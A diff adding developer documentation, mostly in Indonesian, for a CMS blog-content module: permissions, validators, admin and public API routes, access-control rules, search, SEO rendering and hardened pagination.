+## Permission seed (migration `027_awcms_blog_content_permissions.sql`, `030_awcms_blog_content_presentation_permissions.sql`, `052_awcms_blog_content_internal_tag_links_permissions.sql`)
+
+26 permission dari migration 027 persis sesuai doc issue #537 §Permission Seed (`blog_content.posts.*`, `.pages.*`, `.taxonomies.*`, `.revisions.*`, `.settings.*`, `.seo.configure`, `.search.read`). Migration 030 (Issue #542) menambah 10 permission lagi: `templates.{read,configure}`, `menus.{read,configure}`, `widgets.{read,configure}`, `ads.{read,configure}`, `theme.{read,configure}` — satu `read` + satu `configure` per resource, pola granularitas yang sama seperti `taxonomies.{read,configure}` (master/config data admin, bukan konten dengan lifecycle). Tidak ada role grant implisit — hanya assignable lewat Access & Users yang sudah ada.
+
+Sampai Issue #543, ke-36 permission ini ada di database tapi `module.ts`'s `permissions` array kosong — Module Management's permission-sync report (`fetchModulePermissionSyncReport`, dipakai `admin/modules/[moduleKey].astro`'s panel Permissions) karena itu tidak punya apa pun untuk dibandingkan terhadap DB. Issue #543 mendeklarasikan seluruh 36 permission di `module.ts` (persis mencerminkan migration 027+030, bukan menambah permission baru) supaya sync report itu akhirnya berfungsi untuk modul ini, dan menambahkan `navigation: [{ path: "/admin/blog", ... }]` supaya `/admin/blog` muncul di sidebar admin (lihat §Admin UI).
+
+Migration 052 (Issue #641, epic `news_portal`) menambah 3 permission lagi: `internal_links.{read,configure,preview}` — untuk fitur automatic internal tag linking (render-time transform yang me-link nama tag yang cocok di body post published ke halaman archive tag-nya, `domain/internal-tag-linking.ts`). Total permission modul ini sekarang **39** (26 + 10 + 3), seluruhnya dideklarasikan di `module.ts`'s `permissions` array. Endpoint nyata: `GET/PATCH /api/v1/blog/internal-tag-links/settings` (`internal_links.read`/`internal_links.configure`) dan `GET /api/v1/blog/posts/{id}/internal-links/preview` (`internal_links.preview`).
+
+## Domain validation (`domain/`)
+
+- `content-validation.ts` — `validateBlogContentCore`: field inti yang dipakai bersama post & page (`title`, `slug`, `excerpt`, `contentJson`, `contentText`, `locale`), plus field-level validator individual (`validateTitleField`, dst.) yang dipakai ulang oleh partial-update page/post, dan `validateDeleteReasonInput` (`{ reason: string }`) dipakai ulang oleh soft-delete post/page/term.
+- `post-status.ts` — enum status/visibility + `isValidStatusTransition` (satu sumber kebenaran dipakai ulang oleh endpoint lifecycle Issue #538 dan scheduled-publishing Issue #541), plus `canRestorePost`/`canPurgePost`.
+- `page-type.ts` (Issue #539) — enum `PageType` (`standard | landing | legal | system`) + `isPageType`.
+- `slug-policy.ts` — `isValidSlug` (format) + `slugify` (derivasi dari title; pemanggil tetap wajib cek keunikan sendiri).
+- `seo-validation.ts` — `validateSeoFields` (`seoTitle` ≤70 char, `metaDescription` ≤160 char, `canonicalUrl` harus URL http(s) absolut).
+- `taxonomy-policy.ts` — `validateTermParent` (tag tidak boleh punya parent, term tidak boleh jadi parent dirinya sendiri) — pre-check aplikasi sebelum constraint DB `awcms_blog_terms_tag_no_parent_check` tersentuh.
+- `content-access-policy.ts` (Issue #539) — `evaluateContentUpdateAccess`, generic ABAC ownership override (lihat §ABAC di bawah) diekstrak dari `post-access-policy.ts` Issue #538 supaya `page-access-policy.ts` bisa memakai ulang logic yang sama persis, bukan duplikat. `post-access-policy.ts`/`page-access-policy.ts` sekarang jadi thin wrapper yang mengunci `updateGuard` masing-masing (`blog_content.posts.update` / `.pages.update`).
+- `blog-post-validation.ts` — `validateCreateBlogPostInput`/`validateUpdateBlogPostInput`/`validateScheduleBlogPostInput`/`validateSoftDeleteBlogPostInput`. Issue #539 menambah `termIds?: string[]` (validasi bentuk saja — array UUID, dedup; eksistensi per-tenant dicek di application layer).
+- `blog-page-validation.ts` (Issue #539) — sama strukturnya seperti `blog-post-validation.ts`, plus `pageType`/`parentPageId` (menolak diri sendiri sebagai parent)/`menuOrder` (integer ≥0).
+- `blog-term-validation.ts` (Issue #539) — `validateCreateBlogTermInput`/`validateUpdateBlogTermInput`/`validateSoftDeleteBlogTermInput`. Update tidak bisa mengecek ulang aturan tag-tanpa-parent terhadap baris yang sudah ada (validator murni, tidak query DB) — endpoint (`PATCH /api/v1/blog/terms/{id}`) yang menggabungkan field baru dengan baris existing sebelum memanggil `validateTermParent` lagi.
+- `template-policy.ts` (Issue #542) — `validateTemplateLayout` (whitelist `{ columns, sidebarPosition }`), `validateCreateTemplateInput`/`validateUpdateTemplateInput` (key format = `isValidSlug`).
+- `menu-policy.ts` (Issue #542) — `validateMenuItemsInput`: cross-item validation dalam satu batch (id unik, `parentItemId` wajib merujuk item lain di batch yang sama, maksimal satu level nesting) — lihat §Presentation extensions §Menus untuk kenapa `id` wajib client-supplied.
+- `widget-policy.ts` (Issue #542) — `validateCreateWidgetInput`/`validateUpdateWidgetInput`, `bodyText` memakai ulang `content-validation.ts`'s `containsUnsafeHtml` (baru diekspor Issue #542, sebelumnya privat).
+- `ad-policy.ts` (Issue #542) — `validateCreateAdInput`/`validateUpdateAdInput` (`imageUrl`/`linkUrl` = `isAbsoluteHttpUrl`, `endsAt > startsAt`), `validateAdPlacementsInput` (`targetId` wajib untuk `widget|post|page`, terlarang untuk `global`).
+- `theme-policy.ts` (Issue #542) — `validateUpdateThemeSettingsInput` (`mode` = `light|dark|system`, set nilai sama seperti `tenant-admin`'s `VALID_THEMES` tapi didefinisikan independen — repo ini tidak punya konvensi shared-domain-constant lintas modul).
+
+## Application (`application/`)
+
+- `blog-post-directory.ts` — dulu (Issue #537) hanya placeholder read-only; Issue #538 melengkapinya dengan seluruh mutation post (`createBlogPost`, `updateBlogPost`, `softDeleteBlogPost`, `transitionBlogPostStatus`, `restoreBlogPost`, `purgeBlogPost`) di file yang sama — konvensi "satu directory, baca+tulis" yang sama seperti `email/application/email-template-directory.ts`, bukan dipecah jadi file service terpisah. `version` (kolom integer di schema #537) di-increment tiap `updateBlogPost`/`transitionBlogPostStatus` sukses — penanda perubahan monoton saja, **belum** ada optimistic-concurrency check (If-Match/expected-version) yang membacanya. Issue #543 menambah `listBlogPostsForAdmin` (tambahan murni, tidak mengubah fungsi lain di file ini) — `search` (`ILIKE` judul, bukan `search_vector`, supaya query kosong tetap menampilkan semua post), `status`, `termId` (via `EXISTS` terhadap `awcms_blog_post_terms`, bukan `JOIN`, supaya post dengan banyak term tidak pernah muncul dobel), dan pagination bernomor halaman (`page`/`pageSize` + `total`) — dipakai `/admin/blog/posts` untuk search/filter/pagination yang `listBlogPosts`/`GET /api/v1/blog/posts` tidak sediakan. Tidak ada endpoint JSON baru untuk fungsi ini (tidak ada perubahan OpenAPI) — hanya dipanggil langsung dari SSR frontmatter `admin/blog/posts/index.astro`, pola yang sama seperti `admin/index.astro` memanggil fungsi reporting langsung.
+- `blog-page-directory.ts` (Issue #539) — struktur identik `blog-post-directory.ts` (`createBlogPage`, `fetchBlogPageById`, `listBlogPages`, `updateBlogPage`, `softDeleteBlogPage`), **tanpa** `transitionBlogPostStatus`/`restoreBlogPage`/`purgeBlogPage` — pages tidak punya lifecycle-action endpoint di issue ini (lihat §Admin API — Blog Pages). Issue #543 menambah `listBlogPagesForAdmin` — sama konvensinya seperti `listBlogPostsForAdmin` (search+status+pageType filter, pagination bernomor halaman), tanpa filter term (pages tidak punya relasi taksonomi).
+- `author-lookup.ts` (Issue #543) — `fetchAuthorDisplayNames(tx, tenantId, tenantUserIds)`, resolusi `author_tenant_user_id` -> nama tampilan untuk kolom "author" di `/admin/blog/posts` dan `/admin/blog/posts/{id}`. Join sempit `awcms_tenant_users` -> `awcms_identities` -> `awcms_profiles` yang dipersempit dari `identity-access/application/user-directory.ts`'s `fetchTenantUsersWithRoles` (fungsi itu juga memuat role assignment dan digerbangi `identity_access.user_management.read`, permission yang tidak seharusnya jadi syarat seorang editor blog melihat nama penulis kontennya sendiri). Id yang tidak ditemukan (mis. user sudah dihapus) sengaja absen dari `Map` hasil, bukan dilempar error — pemanggil UI fallback ke placeholder "Unknown".
+- `blog-settings-directory.ts` (Issue #543) — `fetchBlogSettings`/`upsertBlogSettings` untuk `awcms_blog_settings` (migration 026, satu baris per tenant), akhirnya diaktifkan lewat `GET`/`PATCH /api/v1/blog/settings` — lihat §Settings API.
+- `blog-taxonomy-directory.ts` — dulu (Issue #537) hanya `fetchBlogTermsByTaxonomyType` placeholder; Issue #539 melengkapinya dengan CRUD term penuh (`createBlogTerm`, `fetchBlogTermById`, `listBlogTerms`, `updateBlogTerm`, `softDeleteBlogTerm`) plus fungsi relasi post-term (`syncPostTermAssignments`, `fetchPostTermIds`, `countExistingTerms`) — lihat §Post-term relation handling.
+- `blog-search.ts` (Issue #539) — `searchBlogContentAdmin` (semua status, guard `search.read`) dan `searchPublicBlogContent` (predikat publik, helper murni — lihat §Search).
+- `blog-revision-directory.ts` (Issue #541) — `createBlogRevision` (INSERT-only, `revision_number` = `MAX(...)+1` scoped ke `(tenant_id, resource_type, resource_id)`), `listBlogRevisions`, `fetchBlogRevisionById` (di-scope ke `resource_id` juga, bukan cuma `id` — revisionId dari post lain tidak bisa dibaca lewat URL post ini). Tidak ada fungsi update/delete di file ini sama sekali — lihat §Revisions.
+- `blog-scheduled-publish.ts` (Issue #541) — `publishDueScheduledPosts`, satu `UPDATE` set-based per tenant, dipanggil `scripts/blog-scheduled-publish.ts` — lihat §Scheduled publishing.
+- `domain/revision-policy.ts` (Issue #541) — `isSignificantContentChange` (true kalau `title`/`contentJson`/`contentText` ada di input update; field kosmetik seperti `seoTitle`/`canonicalUrl`/`slug` tidak memicu revisi baru).
+- `template-directory.ts`/`menu-directory.ts`/`widget-directory.ts`/`ads-directory.ts`/`theme-settings-directory.ts` (Issue #542) — CRUD directory per resource, pola identik `blog-taxonomy-directory.ts` (satu file, baca+tulis, soft-delete). `menu-directory.ts`'s `syncMenuItems` dan `ads-directory.ts`'s `syncAdPlacements` full-replace sub-resource (delete-lalu-insert), sama seperti `syncPostTermAssignments`.
+- `localized-content-directory.ts` (Issue #542) — `setPostTranslationGroup`/`fetchPostTranslations`, satu kolom `UPDATE`/`SELECT` yang sengaja berdiri sendiri, **tidak** menyentuh `blog-post-directory.ts`'s `createBlogPost`/`updateBlogPost` (lihat §Presentation extensions §Multilingual untuk alasan risk/invasiveness-nya).
+
+## Admin API — Blog Posts (Issue #538)
+
+`/api/v1/blog/posts` (`src/pages/api/v1/blog/posts/`), bearer session + `X-AWCMS-Mini-Tenant-ID`, pola identik endpoint lain di base ini (`resolveAuthInputs`/`extractBearerToken` → `authorizeInTransaction`/`evaluateAccess` → service → `recordAuditEvent` → `ok()`/`fail()`).
+
+```txt
+GET    /api/v1/blog/posts                    -> blog_content.posts.read
+POST   /api/v1/blog/posts                     -> blog_content.posts.create
+GET    /api/v1/blog/posts/{id}                -> blog_content.posts.read
+PATCH  /api/v1/blog/posts/{id}                -> blog_content.posts.update (+ author-own-draft override, lihat di bawah)
+DELETE /api/v1/blog/posts/{id}                -> blog_content.posts.delete
+POST   /api/v1/blog/posts/{id}/submit-review  -> blog_content.posts.update (sama override)
+POST   /api/v1/blog/posts/{id}/publish        -> blog_content.posts.publish (Idempotency-Key wajib)
+POST   /api/v1/blog/posts/{id}/schedule       -> blog_content.posts.schedule (Idempotency-Key wajib)
+POST   /api/v1/blog/posts/{id}/archive        -> blog_content.posts.archive (Idempotency-Key wajib)
+POST   /api/v1/blog/posts/{id}/restore        -> blog_content.posts.restore (Idempotency-Key wajib)
+POST   /api/v1/blog/posts/{id}/purge          -> blog_content.posts.purge (Idempotency-Key wajib)
+GET    /api/v1/blog/posts/{id}/quality-checklist -> blog_content.posts.read (Issue #640, read-only preview)
+```
+
+### Content quality checklist gate pada publish/schedule (Issue #640)
+
+`publish`/`schedule` di atas sekarang menjalankan `content-quality-checklist-gate.ts`'s `evaluateContentQualityChecklistForContent` SEBELUM transisi status — server-side, bukan cuma preview klien (`GET .../quality-checklist`, dipakai panel admin editor). Checklist ini adalah no-op (`applicable: false`) kecuali full-online R2-only news portal mode (`news_portal`, Issue #632/#636) aktif untuk tenant pemanggil — mayoritas tenant `blog_content`-only tidak terpengaruh sama sekali. Ketika mode aktif dan satu rule `blocking` gagal (mis. unsafe HTML, local image path, external image URL, featured/gallery image tidak verified R2), request ditolak `422 CONTENT_QUALITY_CHECKLIST_BLOCKED` dan diaudit `blog.post.publish_blocked_by_checklist`/`.schedule_blocked_by_checklist`. Detail rule/severity/kebijakan tenant lengkap ada di `.claude/skills/awcms-news-portal/SKILL.md` §640 (bukan diduplikasi di sini, karena logikanya benar-benar hidup di `news_portal` epic's cross-cutting context, sama seperti §636's gate untuk create/update).
+
+### ABAC — author boleh edit draft sendiri tanpa permission `update`
+
+Doc issue #538 §ABAC Rules menuntut dua hal sekaligus dari **satu** permission `blog_content.posts.update`: "Editor/Admin dengan permission boleh edit semua post tenant" **dan** "Author boleh edit draft sendiri walau belum published" (tanpa permission itu). `domain/content-access-policy.ts`'s `evaluateContentUpdateAccess` (logic generik, diekstrak di Issue #539 supaya pages memakai ulang) mengekspresikan ini sebagai OR: role permission (jalur "Editor/Admin") ATAU (pemanggil = `authorTenantUserId` DAN `status !== 'published'`) (jalur "Author"). `post-access-policy.ts`'s `evaluatePostUpdateAccess` dan `page-access-policy.ts`'s `evaluatePageUpdateAccess` adalah thin wrapper yang mengunci guard-nya ke `blog_content.posts.update`/`.pages.update`. Fungsi generiknya **sengaja tidak** ditaruh di `identity-access/domain/access-control.ts`'s `evaluateAccess` — itu evaluator lintas-modul yang deny-biased (ADR-0004 "default deny, deny overrides allow"); override ALLOW berbasis kepemilikan resource adalah business logic spesifik `blog_content`, disusun di atas `evaluateAccess` (memanggilnya dulu, baru fallback ke ownership check kalau satu-satunya alasan deny adalah `default_deny`), bukan primitive lintas-modul baru seperti `self_approval_deny` yang sudah ada.
+
+Dipakai oleh `PATCH /api/v1/blog/posts/{id}`, `POST /api/v1/blog/posts/{id}/submit-review`, dan `PATCH /api/v1/blog/pages/{id}` (semua map ke permission `update`); endpoint lain (`publish`/`schedule`/`archive`/`restore`/`purge` untuk posts) TIDAK punya ownership override — cek permission murni via `authorizeInTransaction`, sesuai literal doc issue #538: "Author may not publish unless granted `blog_content.posts.publish`". Pages tidak punya lifecycle-action endpoint sama sekali di issue ini (lihat §Admin API — Blog Pages), jadi tidak ada pertanyaan ownership-override untuk publish/schedule/archive pages.
+
+### `AccessAction` union diperluas: `publish`, `schedule`, `archive`
+
+Sama seperti Issue 10.1 menambah `restore`/`purge` dan sync object-queue menambah `retry`, guard `posts.publish`/`.schedule`/`.archive` butuh tiga nilai baru di `identity-access/domain/access-control.ts`'s `AccessAction` union (lihat README modul itu). **Tidak** ditambahkan ke `HIGH_RISK_ACTIONS` (metadata dokumentatif, bukan gerbang) — endpoint-nya tetap memanggil `recordAuditEvent` eksplisit dan mewajibkan `Idempotency-Key` terlepas dari klasifikasi itu.
+
+### Validasi status transition & purge/restore precondition
+
+- Semua transisi status (submit-review/publish/schedule/archive) divalidasi via `isValidStatusTransition` (Issue #537) sebelum mutasi — transisi tidak sah → `409 INVALID_STATUS_TRANSITION`.
+- `canPurgePost(status, deletedAt)` (baru di `post-status.ts`) — purge hanya boleh untuk post yang sudah `archived` atau sudah soft-deleted; selain itu → `409 PURGE_NOT_ALLOWED`.
+- `canRestorePost(deletedAt)` — restore hanya untuk post yang sedang soft-deleted; selain itu → `404`.
+
+### Sanitasi HTML
+
+`domain/content-validation.ts`'s `validateContentJsonField`/`validateContentTextField` menolak (bukan men-sanitize) `<script>`, `<iframe>`, `<embed>`, `<object>`, atribut event-handler inline, dan URL `javascript:` — pola persis sama yang dipakai `email-template-validation.ts` (doc 20 §XSS).
+
+### Idempotency & audit
+
+`Idempotency-Key` wajib untuk `publish`/`schedule`/`archive`/`restore`/`purge` (scope: `blog_post_publish`/`blog_post_schedule`/`blog_post_archive`/`blog_post_restore`/`blog_post_purge`, tabel generik `awcms_idempotency_keys`). `create`/`update` tidak mewajibkannya (direkomendasikan saja per doc issue #538) — retry `create` yang mengulang slug yang sama akan kena `409 SLUG_CONFLICT` dari partial unique index, sama seperti `POST /api/v1/email/templates`.
+
+Audit `action` memakai string persis dari doc issue #538 §Audit Requirements (`blog.post.created`, `.updated`, `.submitted_for_review`, `.published`, `.scheduled`, `.archived`, `.deleted`, `.restored`, `.purged`) — bukan verb generik singkat (`create`/`update`) yang dipakai modul lain, karena issue ini eksplisit meminta identifier tersebut.
+
+### Purge — pembersihan `post_terms`
+
+`purgeBlogPost` menghapus baris `awcms_blog_post_terms` milik post itu lebih dulu (metadata join murni, tidak berarti apa-apa begitu post-nya hilang) sebelum `DELETE` post-nya sendiri — **berbeda** dari pola `POST /api/v1/profiles/{id}/purge` yang menangkap foreign-key violation via savepoint, karena di sini kita sendiri yang memiliki kedua tabel dan tahu persis apa yang aman dihapus lebih dulu. `awcms_blog_revisions` sengaja **tidak** disentuh (tidak ber-FK ke post, tetap jadi riwayat historis meski post-nya sudah purge).
+
+## Admin API — Blog Pages (Issue #539)
+
+`/api/v1/blog/pages` (`src/pages/api/v1/blog/pages/`), pola identik posts (guard → validasi → service → audit → response). **Beda dari posts: hanya CRUD, tidak ada lifecycle-action endpoint** (`submit-review`/`publish`/`schedule`/`archive`/`restore`/`purge`) — doc issue #539 §Routes hanya mendaftarkan GET/POST/GET/PATCH/DELETE untuk pages, meskipun permission `blog_content.pages.{publish,archive,restore,purge}` sudah diseed sejak Issue #537. Permission itu menunggu issue lanjutan yang benar-benar membangun endpoint-nya — jangan asumsikan lifecycle pages sudah berfungsi hanya karena permission-nya ada di katalog.
+
+```txt
+GET    /api/v1/blog/pages          -> blog_content.pages.read
+POST   /api/v1/blog/pages          -> blog_content.pages.create
+GET    /api/v1/blog/pages/{id}     -> blog_content.pages.read
+PATCH  /api/v1/blog/pages/{id}     -> blog_content.pages.update (+ author-own-draft override)
+DELETE /api/v1/blog/pages/{id}     -> blog_content.pages.delete
+GET    /api/v1/blog/pages/{id}/quality-checklist -> blog_content.pages.read (Issue #640, read-only preview — see note below)
+```
+
+Tidak idempotency-gated (sama seperti posts create/update — recommended, bukan required). Audit `action` memakai pola literal yang sama: `blog.page.created`/`.updated`/`.deleted`.
+
+`GET .../quality-checklist` (Issue #640) mengevaluasi checklist konten yang sama dengan posts (lihat §Content quality checklist gate di atas), TAPI murni **preview** untuk pages — karena tidak ada `POST .../publish`/`.../schedule` untuk pages sama sekali (paragraf di atas), tidak ada state transition apa pun untuk digerbangi di sini. `taxonomy_exists` selalu `applicable: false` untuk pages (tidak ada tabel `_terms` untuk pages).
+
+## Admin API — Blog Taxonomies (Issue #539)
+
+`/api/v1/blog/terms` (`src/pages/api/v1/blog/terms/`). **Tidak ada `GET /{id}`** — doc issue #539 §Routes hanya mendaftarkan list/create/update/delete untuk terms.
+
+```txt
+GET    /api/v1/blog/terms          -> blog_content.taxonomies.read
+POST   /api/v1/blog/terms          -> blog_content.taxonomies.configure
+PATCH  /api/v1/blog/terms/{id}     -> blog_content.taxonomies.configure
+DELETE /api/v1/blog/terms/{id}     -> blog_content.taxonomies.configure
+```
+
+Satu permission (`configure`) menggerbangi create/update/delete sekaligus — sama seperti `sync_storage.conflict_resolution.approve` menggerbangi seluruh `POST /sync/conflicts/{id}/resolve` apa pun hasilnya (permission = kapabilitas "mengelola taksonomi", bukan per-aksi terpisah). Tidak ada restore/purge — doc issue #537's permission seed tidak punya `taxonomies.restore`/`.purge`, jadi soft-delete term bersifat satu arah lewat kode ini (baris tetap ada di DB untuk audit, tapi tidak ada jalur API mengembalikannya).
+
+`PATCH` yang mengubah `taxonomyType` ke `tag` sambil `parentId` lama masih ada (tidak ikut dikosongkan di request yang sama) ditolak `400` — endpoint menggabungkan field yang dikirim dengan baris existing sebelum memanggil ulang `validateTermParent`, persis dicatat di `blog-term-validation.ts`'s docblock.
+
+## Post-term relation handling (Issue #539)
+
+Doc issue #539 §Scope menyebut "Post-term relation handling" tapi **tidak** mendaftarkan route khusus untuk itu di §Routes — jadi ini ditanam di payload create/update blog post yang sudah ada (Issue #538), bukan endpoint baru:
+
+- `POST`/`PATCH /api/v1/blog/posts(/{id})` menerima `termIds?: string[]` opsional.
+- Kalau dikirim, `countExistingTerms` mengecek dulu semua id ada & milik tenant yang sama (`400 VALIDATION_ERROR` kalau tidak) — dijalankan **sebelum** post ditulis, supaya tidak ada post "setengah jadi" saat `termIds` invalid.
+- `syncPostTermAssignments` men-**replace** seluruh assignment (`DELETE` semua baris `awcms_blog_post_terms` milik post itu, lalu `INSERT` ulang set yang dikirim) — bukan diff/merge, karena caller selalu mengirim daftar lengkap yang diinginkan.
+- Response `GET`/`POST`/`PATCH /api/v1/blog/posts(/{id})` menyertakan `termIds` (di-assemble di route handler lewat `fetchPostTermIds`, **bukan** field pada `BlogPostView` dari `blog-post-directory.ts` — directory tetap murni soal tabel `awcms_blog_posts` saja). `GET /api/v1/blog/posts` (list) **tidak** menyertakan `termIds` per item (query tambahan per baris tidak sepadan untuk daftar).
+
+## Search (Issue #539)
+
+`blog-search.ts` — PostgreSQL full-text search lewat `search_vector @@ websearch_to_tsquery('simple', q)`, `UNION ALL` antara posts dan pages, diurutkan `created_at DESC, id DESC`.
+
+- **`GET /api/v1/blog/search`** (guard `blog_content.search.read`) — admin search, boleh mengembalikan status apa pun (`draft`/`review`/.../`archived`) selama caller punya `search.read`; tidak ada komposisi permission tambahan per-status. Keyset-paginated lewat `_shared/keyset-pagination.ts` (`cursor` base64 `(createdAt, id)`), pola sama persis `GET /api/v1/logs/audit`. Filter opsional `?type=post|page` dan `?status=`.
+- **`searchPublicBlogContent`** — helper murni, **tidak** dipasang ke route apa pun di issue ini (rendering rute publik = Issue #540, eksplisit Out of Scope di doc issue #539). Predikat persis dari doc issue #539 §Public Visibility Predicate: `status = 'published' AND visibility = 'public' AND deleted_at IS NULL AND published_at IS NOT NULL AND published_at <= now()`. Issue #540 memanggil fungsi ini langsung, bukan menulis ulang predikatnya.
+
+## Public routes (Issue #540)
+
+`src/pages/blog/[tenantCode]/` — 7 rute publik, anonim (tanpa sesi/header tenant), per ADR-0009: resolusi tenant dari segmen path `tenantCode`, bukan subdomain/header.
+
+```txt
+GET /blog/{tenantCode}                         -> index (paginated, tanpa auth/permission — publik)
+GET /blog/{tenantCode}/{slug}                   -> detail post
+GET /blog/{tenantCode}/category/{slug}          -> arsip kategori
+GET /blog/{tenantCode}/tag/{slug}               -> arsip tag
+GET /blog/{tenantCode}/search?q=                -> search publik (memakai searchPublicBlogContent, Issue #539)
+GET /blog/{tenantCode}/feed.xml                 -> RSS 2.0
+GET /blog/{tenantCode}/sitemap-blog.xml         -> sitemap protocol 0.9
+```
+
+**Hanya blog post**, bukan pages (`awcms_blog_pages`) — doc issue #540 §Scope hanya mendaftarkan "Public post detail page", tidak ada "Public page detail" sama sekali di antara bullet scope-nya (beda dari §Routes issue #539 yang eksplisit menyebut halaman statis). Rendering publik untuk `blog_content` pages tetap backlog terbuka.
+
+### Kenapa `.ts` API route, bukan `.astro` page
+
+Ketujuh rute ini adalah `APIRoute` (`.ts`, HTML/XML string dirender manual), **bukan** file `.astro` — keputusan disengaja. Repo ini tidak punya konvensi test untuk output `.astro` (semua integration test yang ada, termasuk seluruh suite `blog_content` sebelumnya, memanggil `APIRoute` handler langsung lewat `tests/integration/harness.ts`'s `invoke()`/`invokeRaw()`). Menulis rute ini sebagai `.astro` akan membuatnya untestable lewat pola yang sudah mapan di repo — sementara persyaratan issue ini sendiri eksplisit ("Tests cover public visibility leakage... SEO rendering... RSS and sitemap content filtering") menuntut test end-to-end yang nyata, bukan cuma unit test fungsi murni. `invokeRaw()` (baru, `tests/integration/harness.ts`) melengkapi `invoke()` untuk handler yang me-return body non-JSON — `invoke()` sendiri selalu `JSON.parse(text)` dan akan throw untuk HTML/XML.
+
+### Dua predikat visibilitas publik yang berbeda
+
+Doc issue #540 mendefinisikan satu "Public Visibility Rule" dasar (`status='published' AND visibility='public' AND deleted_at IS NULL AND published_at IS NOT NULL AND published_at <= now()`) plus aturan tambahan "listing/search/feed/sitemap: `visibility != 'unlisted'`". Kedua kalimat itu redundan kalau predikat dasarnya SELALU `visibility='public'` — kecuali predikat dasar itu dimaksudkan untuk konteks LISTING saja, dan DETAIL punya predikat sendiri yang sedikit lebih longgar. Acceptance criteria issue ini mengonfirmasi baca-an itu: **"Unlisted content is excluded from listing/search/feed/sitemap"** (bukan dari SEMUA akses publik) — artinya unlisted memang harus tetap bisa diakses lewat link langsung, itulah gunanya tier "unlisted" ada terpisah dari "private" (yang tidak pernah publik sama sekali).
+
+`public-blog-directory.ts` karena itu punya **dua** predikat:
+
+- **Listing** (index/kategori/tag/search/feed/sitemap): `visibility = 'public'` ketat — sama persis predikat `searchPublicBlogContent` (Issue #539).
+- **Detail** (`fetchPublicBlogPostBySlug`): `visibility IN ('public', 'unlisted')` — private tetap selalu ditolak.
+
+Kalau interpretasi ini pernah dianggap salah oleh maintainer, ini satu-satunya tempat yang perlu diubah (bukan tersebar di 7 route handler).
+
+### Content block schema (baru, didefinisikan oleh issue ini)
+
+`content_json` sebelumnya "opaque to the API" (doc issue #537/#538). Issue #540 pertama kali mendefinisikan bentuk konkretnya karena rendering publik butuh sesuatu yang nyata untuk dirender: `{ blocks: ContentBlock[] }` dengan 4 tipe block — `paragraph`, `heading` (level 1-6), `list` (`ordered?: boolean`, `items: string[]`), `quote`. `domain/content-block-rendering.ts`'s `renderContentJsonToHtml` adalah **whitelist renderer** — setiap tipe block hanya pernah mengeluarkan teks lewat `escapeHtml`, tidak ada tipe block "raw html". Block dengan `type` tak dikenal atau field tidak valid di-skip diam-diam (tidak pernah throw — lihat §Error handling). Menambah tipe block baru (image, embed, table, ...) berarti menambah `case` baru di `switch` fungsi itu, bukan membuka raw-HTML escape hatch.
+
+### SEO rendering (`domain/seo-rendering.ts`)
+
+- `resolveSeoTitle`: `seoTitle || title`.
+- `resolveMetaDescription`: `metaDescription || excerpt || <ringkasan digenerate dari contentText, dipotong di batas kata, diberi "...">`.
+- `resolveCanonicalUrl`: pakai `canonicalUrl` penulis kalau itu URL http(s) absolut yang valid (re-validasi lewat `isAbsoluteHttpUrl` yang sama dengan write-time check di `seo-validation.ts` — defense in depth, "Do not render unsafe URLs"); kalau tidak, fallback ke URL halaman itu sendiri; kalau keduanya tidak valid, `null` (tag `<link rel="canonical">` tidak dirender sama sekali, bukan dirender dengan URL tidak aman).
+
+### Error handling — tidak pernah bocorkan stack trace
+
+Setiap route handler dibungkus `try/catch` di level teratas: error asli di-log lewat `log("error", ...)` (untuk operator), tapi respons ke klien SELALU string generik tetap (`src/lib/html/error-responses.ts`'s `notFoundHtmlResponse`/`serverErrorHtmlResponse`/`notFoundXmlResponse`/`serverErrorXmlResponse`) — tidak pernah pesan/`error.message` mentah. Tenant `tenantCode` tidak ditemukan ATAU tidak `active` menghasilkan `404` yang identik (ADR-0009: "jangan bocorkan keberadaan tenant").
+
+### Pagination
+
+Index dan arsip kategori/tag pakai `?page=` (1-indexed) + `LIMIT`/`OFFSET` sederhana, bukan keyset — ini halaman publik yang dibaca pengunjung manusia (ekspektasi UX "halaman 1, 2, 3", bukan cursor buram), beda dari admin search (Issue #539) yang keyset-paginated. `pageSize` diambil dari `awcms_blog_settings.posts_per_page` (Issue #537, default 10) lewat `fetchPublicBlogSettings`. RSS/sitemap tidak dipaginasi sama sekali — flat, dibatasi 50 post terbaru (`FEED_ITEM_LIMIT`), karena konsumennya mesin (feed reader/crawler), bukan pengunjung yang mengklik "next".
+
+`?page=` di-normalisasi lewat `parsePageParam`/`boundedPageNumber` (`src/modules/_shared/offset-pagination.ts`, Issue #819) — **bukan** `Number(param)` langsung. Route ini publik tanpa auth, jadi `page` wajib terklamp di kedua ujung: `?page=1e8` dulu jadi `OFFSET 1e9` (Postgres tetap memindai lalu membuang satu miliar baris sambil menahan satu koneksi pool — DoS satu-request), dan `?page=abc` jadi `OFFSET NaN` → 500. Sekarang nilai non-numerik/`NaN`/`±Infinity`/negatif jatuh ke halaman 1, pecahan di-truncate, dan batas atas `MAX_PAGE_NUMBER` = 10.000. Junk dinormalisasi ke halaman 1, bukan 400: ini route arsip HTML — `?page=` rusak harus merender halaman pertama, bukan error yang ikut terindeks crawler. Nilai terklamp itu juga yang dipakai untuk merender nav pagination, supaya `?page=abc` tidak pernah menghasilkan link `NaN`. Daftar admin (`listBlogPostsForAdmin`/`listBlogPagesForAdmin`) memakai helper yang sama.
+
+## Public routes `/news` (Issue #560, epic #555)
+
+`src/pages/news/` — tenant-code-free counterpart of `/blog/{tenantCode}`
+above, added by epic #555 ("online public tenant routing, news routes, and
+tenant domain management"), **not** epic #536. See
+`.claude/skills/awcms-tenant-domain-routing/SKILL.md` §Rute publik
+`/news` for the full cross-issue writeup (config, resolver, module-disabled
+gate); this section only covers what's specific to this module.
+
+```txt
+GET /news                         -> index (paginated, same as /blog/{tenantCode})
+GET /news/{slug}                  -> detail post
+GET /news/category/{slug}         -> category archive
+GET /news/tag/{slug}              -> tag archive
+GET /news/search?q=               -> public search (same searchPublicBlogContent, Issue #539)
+GET /news/feed.xml                -> RSS 2.0
+GET /news/sitemap-news.xml        -> sitemap protocol 0.9
+```
+
+Same 7 routes as `/blog/{tenantCode}` (same `.ts` `APIRoute` decision — see
+§Kenapa `.ts` API route above, same reasoning applies unchanged), reusing
+every application/domain service unchanged: `public-blog-directory.ts`
+(same two visibility predicates, §Dua predikat visibilitas publik above,
+unmodified), `public-page-rendering.ts`, `seo-rendering.ts`,
+`content-block-rendering.ts`, `blog-search.ts`'s `searchPublicBlogContent`,
+`src/lib/html/error-responses.ts`. **Only post, still no public route for
+pages** — same scope boundary as `/blog/{tenantCode}` (§Public routes
+above), unchanged by this issue.
+
